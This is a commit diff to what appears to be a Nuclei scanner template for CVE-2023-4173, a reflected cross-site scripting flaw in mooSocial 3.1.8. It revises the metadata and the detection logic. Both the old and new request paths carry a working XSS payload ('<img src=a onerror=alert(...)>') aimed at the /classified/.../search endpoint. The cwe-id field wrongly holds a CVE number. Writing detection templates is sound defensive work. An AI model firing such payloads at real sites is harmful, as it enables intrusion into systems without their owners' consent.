fix template

http/cves/2023/CVE-2023-4173.yaml

@@ -3,37 +3,45 @@ id: CVE-2023-4173
 info:
   name: mooSocial 3.1.8 - Reflected XSS
   author: momika233
-  severity: high
-  description: |
-    The attacker can send to victim a link containing a malicious URL in an email or instant message,can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+  severity: medium
+  description: >
+    A vulnerability, which was classified as problematic, was found in
+    mooSocial mooStore 3.1.6. Affected is an unknown function of the file
+    /search/index.
   reference:
     - https://www.exploit-db.com/exploits/51670
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-4173
+    - http://packetstormsecurity.com/files/174016/mooSocial-3.1.8-Cross-Site-Scripting.html
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
-    cvss-score: 3.5
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
     cwe-id: CVE-2023-4173
   metadata:
     max-request: 1
     verified: true
-    fofa-query: "mooSocial"
-  tags: mooSocial,xss
+    fofa-query: mooSocial
+  tags: cve,cve2023,moosocial,xss
 
-requests:
+
+http:
   - method: GET
     path:
-      - "{{BaseURL}/classifiedsmomika233\"><img%20src=a%20onerror=alert('momika233')>momika233/search?category=1"
+      - "{{BaseURL}}/classified/%22%3E%3Cimg%20src=a%20onerror=alert('document.\
+        domain')%3E/search?category=1"
 
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
-          - "<img src=x onerror=alert('momika233')>"
+          - "<img src=a onerror=alert('document.domain')>"
+          - "mooSocial"
+        condition: and
 
       - type: word
         part: header
         words:
           - text/html
-
       - type: status
         status:
-          - 200
+          - 404